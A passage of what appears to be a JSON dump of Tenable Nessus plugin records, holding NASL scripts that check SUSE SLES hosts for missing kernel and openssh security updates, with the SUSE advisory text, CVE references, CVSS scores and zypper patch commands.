4.4.121-92_98 fixes several issues.\n\nThe following security issues were fixed :\n\nCVE-2018-14633: A security flaw was found in the\nchap_server_compute_md5() function in the ISCSI target code in the\nLinux kernel in a way an authentication request from an ISCSI\ninitiator is processed. An unauthenticated remote attacker can cause a\nstack buffer overflow and smash up to 17 bytes of the stack. The\nattack requires the iSCSI target to be enabled on the victim host.\nDepending on how the target's code was built (i.e. depending on a\ncompiler, compile flags and hardware architecture) an attack may lead\nto a system crash and thus to a denial-of-service or possibly to a\nnon-authorized access to data exported by an iSCSI target. Due to the\nnature of the flaw, privilege escalation cannot be fully ruled out,\nalthough we believe it is highly unlikely (bsc#1107832).\n\nCVE-2018-5390: Fixed the possiblilty that the kernel can be forced to\nmake very expensive calls to tcp_collapse_ofo_queue() and\ntcp_prune_ofo_queue() for every incoming packet which can lead to a\ndenial of service (bnc#1102682).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1102682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-14633/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-5390/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183789-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a631f40\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2688=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2688=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_98-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_98-default-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2018-11-20T03:56:40", "references": ["https://www.suse.com/security/cve/CVE-2018-5391/", "http://www.nessus.org/u?7232d5e0", "https://bugzilla.suse.com/show_bug.cgi?id=1103098"], "pluginID": "119036", "description": "This update for the Linux Kernel 4.4.121-92_73 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-5391: Fixed a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may have caused a denial of service condition by sending specially crafted IP fragments. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size (bsc#1103098).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-19T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:3792-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-20T03:56:40", "vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5391"], "modified": "2018-11-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_64-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_80-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_73-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_85-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_120-92_70-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_67-default"], "id": "SUSE_SU-2018-3792-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3792-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119036);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/19 11:02:40\");\n\n script_cve_id(\"CVE-2018-5391\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:3792-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.121-92_73 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-5391: Fixed a denial of service attack with low rates of\nspecially modified packets targeting IP fragment re-assembly. An\nattacker may have caused a denial of service condition by sending\nspecially crafted IP fragments. The current vulnerability\n(CVE-2018-5391) became exploitable in the Linux kernel with the\nincrease of the IP fragment reassembly queue size (bsc#1103098).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-5391/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183792-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7232d5e0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2689=1 SUSE-SLE-SAP-12-SP2-2018-2690=1\nSUSE-SLE-SAP-12-SP2-2018-2691=1 SUSE-SLE-SAP-12-SP2-2018-2692=1\nSUSE-SLE-SAP-12-SP2-2018-2693=1 SUSE-SLE-SAP-12-SP2-2018-2697=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2689=1 SUSE-SLE-SERVER-12-SP2-2018-2690=1\nSUSE-SLE-SERVER-12-SP2-2018-2691=1 SUSE-SLE-SERVER-12-SP2-2018-2692=1\nSUSE-SLE-SERVER-12-SP2-2018-2693=1 SUSE-SLE-SERVER-12-SP2-2018-2697=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_64-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_67-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_120-92_70-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_73-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_80-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_85-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_64-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_67-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_120-92_70-default-8-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_73-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_80-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_85-default-5-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-20T03:39:53", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=982273", "https://www.suse.com/security/cve/CVE-2018-15919/", "https://bugzilla.suse.com/show_bug.cgi?id=1106163", "http://www.nessus.org/u?9c9c2d19", "https://www.suse.com/security/cve/CVE-2018-15473/", "https://bugzilla.suse.com/show_bug.cgi?id=1105010", "https://bugzilla.suse.com/show_bug.cgi?id=964336", "https://bugzilla.suse.com/show_bug.cgi?id=1091396"], "pluginID": "119031", "description": "This update for openssh fixes the following issues :\n\nFollowing security issues have been fixed :\n\nCVE-2018-15919: Remotely observable behaviour in auth-gss2.c in OpenSSH could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. OpenSSH developers do not want to treat such a username enumeration (or 'oracle') as a vulnerability.\n(bsc#1106163)\n\nCVE-2018-15473: OpenSSH was prone to a user existance oracle vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. (bsc#1105010)\n\nAlso the following security related hardening change was done: Remove arcfour,cast,blowfish from list of default ciphers. (bsc#982273)\n\nAnd \n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-19T00:00:00", "title": "SUSE SLES12 Security Update : openssh (SUSE-SU-2018:3776-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-20T03:39:53", "vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-15473", "CVE-2018-15919"], "modified": "2018-11-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2018-3776-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119031", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3776-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119031);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/19 11:02:40\");\n\n script_cve_id(\"CVE-2018-15473\", \"CVE-2018-15919\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssh (SUSE-SU-2018:3776-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nFollowing security issues have been fixed :\n\nCVE-2018-15919: Remotely observable behaviour in auth-gss2.c in\nOpenSSH could be used by remote attackers to detect existence of users\non a target system when GSS2 is in use. OpenSSH developers do not want\nto treat such a username enumeration (or 'oracle') as a vulnerability.\n(bsc#1106163)\n\nCVE-2018-15473: OpenSSH was prone to a user existance oracle\nvulnerability due to not delaying bailout for an invalid\nauthenticating user until after the packet containing the request has\nbeen fully parsed, related to auth2-gss.c, auth2-hostbased.c, and\nauth2-pubkey.c. (bsc#1105010)\n\nAlso the following security related hardening change was done: Remove\narcfour,cast,blowfish from list of default ciphers. (bsc#982273)\n\nAnd \n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1091396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1105010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15919/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183776-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9c9c2d19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-2698=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-2698=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-54.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-54.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-20T03:44:31", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=982273", "https://www.suse.com/security/cve/CVE-2018-15919/", "https://bugzilla.suse.com/show_bug.cgi?id=1106163", "https://www.suse.com/security/cve/CVE-2018-15473/", "https://bugzilla.suse.com/show_bug.cgi?id=1105010", "https://bugzilla.suse.com/show_bug.cgi?id=964336", "https://bugzilla.suse.com/show_bug.cgi?id=1091396", "http://www.nessus.org/u?ee5de829"], "pluginID": "119032", "description": "This update for openssh fixes the following issues :\n\nFollowing security issues have been fixed :\n\nCVE-2018-15919: Remotely observable behaviour in auth-gss2.c in OpenSSH could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. OpenSSH developers do not want to treat such a username enumeration (or 'oracle') as a vulnerability.\n(bsc#1106163)\n\nCVE-2018-15473: OpenSSH was prone to a user existance oracle vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. (bsc#1105010)\n\nAlso the following security related hardening change was done: Removed arcfour,blowfish,cast from list of default ciphers as they are long discontinued and should no longer be used. (bsc#982273)\n\nAnd \n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-19T00:00:00", "title": "SUSE SLES11 Security Update : openssh (SUSE-SU-2018:3781-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-20T03:44:31", "vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-15473", "CVE-2018-15919"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-fips"], "id": "SUSE_SU-2018-3781-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119032", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3781-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119032);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/19 11:02:40\");\n\n script_cve_id(\"CVE-2018-15473\", \"CVE-2018-15919\");\n\n script_name(english:\"SUSE SLES11 Security Update : openssh (SUSE-SU-2018:3781-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nFollowing security issues have been fixed :\n\nCVE-2018-15919: Remotely observable behaviour in auth-gss2.c in\nOpenSSH could be used by remote attackers to detect existence of users\non a target system when GSS2 is in use. OpenSSH developers do not want\nto treat such a username enumeration (or 'oracle') as a vulnerability.\n(bsc#1106163)\n\nCVE-2018-15473: OpenSSH was prone to a user existance oracle\nvulnerability due to not delaying bailout for an invalid\nauthenticating user until after the packet containing the request has\nbeen fully parsed, related to auth2-gss.c, auth2-hostbased.c, and\nauth2-pubkey.c. (bsc#1105010)\n\nAlso the following security related hardening change was done: Removed\narcfour,blowfish,cast from list of default ciphers as they are long\ndiscontinued and should no longer be used. (bsc#982273)\n\nAnd \n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as 